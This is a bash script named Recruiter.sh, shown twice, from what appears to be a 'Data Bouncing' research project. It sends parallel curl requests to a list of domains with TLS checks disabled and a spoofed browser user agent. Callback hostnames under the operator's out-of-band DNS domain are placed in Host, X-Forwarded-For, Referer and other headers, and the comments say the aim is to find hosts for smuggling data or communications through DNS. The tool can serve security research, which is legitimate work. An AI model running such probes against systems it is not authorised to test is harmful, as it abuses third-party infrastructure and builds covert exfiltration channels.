yosignals/Recruiter.sh

## Recruiter.sh
#!/bin/bash

# A hunter script from John & Dave's Data- Bouncing project https://thecontractor.io/data-bouncing/
# This script will find candidates for smuggling data / coms / whatever starting as HTTP/S requests to domains, ending up in your DNS reciever to be rebuilt/read whatever
# dont forget to add your own OOB server, that could be interactsh or collaborator, or something esle, if you dont know what you're doing, go read the posts :)
# have fun, dont be a dick.

# Pre-flight check to verify and install necessary utilities
for utility in curl parallel bc; do
  if ! command -v $utility &> /dev/null; then
    read -p "$utility is not installed. Would you like to install it? (y/N) " yn
    case $yn in
      [Yy]* )
        if [[ $EUID -ne 0 ]]; then
          echo "Please run this script as root or use sudo to install $utility."
          exit 1
        fi
        if command -v apt &> /dev/null; then
          apt update && apt install -y $utility
        elif command -v yum &> /dev/null; then
          yum install -y $utility
        else
          echo "Could not find a package manager to install $utility. Please install it manually."
          exit 1
        fi
        ;;
      * )
        echo "$utility is required for this script to run. Exiting."
        exit 1
        ;;
    esac
  fi
done

# Default OOB domain
oob_domain=""

# Header formats
declare -A headers
headers=(
    ["X-Forwarded-For"]="xff.%s.oob.com"
    ["X-Wap-Profile"]="wafp.%s.oob.com/wap.xml"
    ["Contact"]="root@contact.%s.oob.com"
    ["X-Real-IP"]="rip.%s.oob.com"
    ["True-Client-IP"]="trip.%s.oob.com"
    ["X-Client-IP"]="xclip.%s.oob.com"
    ["Forwarded"]="for=ff.%s.oob.com"
    ["X-Originating-IP"]="origip.%s.oob.com"
    ["Client-IP"]="clip.%s.oob.com"
    ["Referer"]="ref.%s.oob.com"
    ["From"]="root@from.%s.oob.com"
)

domains_file="domains.txt"  # default domains file name

# Parse command-line arguments
while getopts ":o:d:" opt; do
  case ${opt} in
    o )
      oob_domain=$OPTARG
      ;;
    d )
      domains_file=$OPTARG
      ;;
    * )
      echo "Invalid option: -$OPTARG" >&2
      exit 1
      ;;
  esac
done
shift $((OPTIND -1))

# User agent to use in the requests
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"

# Check if domains file exists
if [[ ! -f $domains_file ]]; then
  echo "File $domains_file not found!"
  exit 1
fi

# Get the total number of non-empty lines in the domains.txt file
total_hosts=$(grep -c . "$domains_file")

# Create a log file
log_file="script_log_$(date +"%Y%m%d_%H%M%S").txt"

# Export variables for access in parallel jobs
export user_agent
export oob_domain
export total_hosts
export log_file
export headers

# Define a function to process each domain, to be run in parallel
process_domain() {
  domain=$1
  current_host_number=$PARALLEL_SEQ

  # Skip empty lines
  [ -z "$domain" ] && return

  # Calculate the percentage of completion
  if (( total_hosts > 0 )); then
    percentage_complete=$(bc <<< "scale=2; ($current_host_number / $total_hosts) * 100")
  else
    percentage_complete=0
  fi

  # Construct headers for the current domain
  curl_headers=(
      -H $'User-Agent: '"${user_agent}"
      -H $'Host: host.'"${domain}.${oob_domain}"
      -H $'Origin: '"https://$domain"
  )

  for header in "${!headers[@]}"; do
      formatted_header=$(printf "${headers[$header]}" "$domain")
      curl_headers+=(-H "${header}: ${formatted_header}")
  done

  # Execute the curl command with the generated headers
  curl -i -s -k -X $'GET' \
      --max-time 16 \
      "${curl_headers[@]}" \
      $'http://'"${domain}"'/' > /dev/null

  # Create a log message with the progress report
  timestamp=$(date +"%Y-%m-%d %H:%M:%S")
  log_message="$timestamp - Request sent to $domain - $current_host_number of $total_hosts ($percentage_complete% complete)"

  # Print the log message to the console
  echo "$log_message"

  # Log the message to the log file
  echo "$log_message" >> "$log_file"
}

export -f process_domain

# Run the process_domain function in parallel for each line in the domains file
parallel -a "$domains_file" -j 100% process_domain
	#!/bin/bash

	# A hunter script from John & Dave's Data- Bouncing project https://thecontractor.io/data-bouncing/
	# This script will find candidates for smuggling data / coms / whatever starting as HTTP/S requests to domains, ending up in your DNS reciever to be rebuilt/read whatever
	# dont forget to add your own OOB server, that could be interactsh or collaborator, or something esle, if you dont know what you're doing, go read the posts :)
	# have fun, dont be a dick.

	# Pre-flight check to verify and install necessary utilities
	for utility in curl parallel bc; do
	if ! command -v $utility &> /dev/null; then
	read -p "$utility is not installed. Would you like to install it? (y/N) " yn
	case $yn in
	[Yy]* )
	if [[ $EUID -ne 0 ]]; then
	echo "Please run this script as root or use sudo to install $utility."
	exit 1
	fi
	if command -v apt &> /dev/null; then
	apt update && apt install -y $utility
	elif command -v yum &> /dev/null; then
	yum install -y $utility
	else
	echo "Could not find a package manager to install $utility. Please install it manually."
	exit 1
	fi
	;;
	* )
	echo "$utility is required for this script to run. Exiting."
	exit 1
	;;
	esac
	fi
	done

	# Default OOB domain
	oob_domain=""

	# Header formats
	declare -A headers
	headers=(
	["X-Forwarded-For"]="xff.%s.oob.com"
	["X-Wap-Profile"]="wafp.%s.oob.com/wap.xml"
	["Contact"]="root@contact.%s.oob.com"
	["X-Real-IP"]="rip.%s.oob.com"
	["True-Client-IP"]="trip.%s.oob.com"
	["X-Client-IP"]="xclip.%s.oob.com"
	["Forwarded"]="for=ff.%s.oob.com"
	["X-Originating-IP"]="origip.%s.oob.com"
	["Client-IP"]="clip.%s.oob.com"
	["Referer"]="ref.%s.oob.com"
	["From"]="root@from.%s.oob.com"
	)

	domains_file="domains.txt" # default domains file name

	# Parse command-line arguments
	while getopts ":o:d:" opt; do
	case ${opt} in
	o )
	oob_domain=$OPTARG
	;;
	d )
	domains_file=$OPTARG
	;;
	* )
	echo "Invalid option: -$OPTARG" >&2
	exit 1
	;;
	esac
	done
	shift $((OPTIND -1))

	# User agent to use in the requests
	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"

	# Check if domains file exists
	if [[ ! -f $domains_file ]]; then
	echo "File $domains_file not found!"
	exit 1
	fi

	# Get the total number of non-empty lines in the domains.txt file
	total_hosts=$(grep -c . "$domains_file")

	# Create a log file
	log_file="script_log_$(date +"%Y%m%d_%H%M%S").txt"

	# Export variables for access in parallel jobs
	export user_agent
	export oob_domain
	export total_hosts
	export log_file
	export headers

	# Define a function to process each domain, to be run in parallel
	process_domain() {
	domain=$1
	current_host_number=$PARALLEL_SEQ

	# Skip empty lines
	[ -z "$domain" ] && return

	# Calculate the percentage of completion
	if (( total_hosts > 0 )); then
	percentage_complete=$(bc <<< "scale=2; ($current_host_number / $total_hosts) * 100")
	else
	percentage_complete=0
	fi

	# Construct headers for the current domain
	curl_headers=(
	-H $'User-Agent: '"${user_agent}"
	-H $'Host: host.'"${domain}.${oob_domain}"
	-H $'Origin: '"https://$domain"
	)

	for header in "${!headers[@]}"; do
	formatted_header=$(printf "${headers[$header]}" "$domain")
	curl_headers+=(-H "${header}: ${formatted_header}")
	done

	# Execute the curl command with the generated headers
	curl -i -s -k -X $'GET' \
	--max-time 16 \
	"${curl_headers[@]}" \
	$'http://'"${domain}"'/' > /dev/null

	# Create a log message with the progress report
	timestamp=$(date +"%Y-%m-%d %H:%M:%S")
	log_message="$timestamp - Request sent to $domain - $current_host_number of $total_hosts ($percentage_complete% complete)"

	# Print the log message to the console
	echo "$log_message"

	# Log the message to the log file
	echo "$log_message" >> "$log_file"
	}

	export -f process_domain

	# Run the process_domain function in parallel for each line in the domains file
	parallel -a "$domains_file" -j 100% process_domain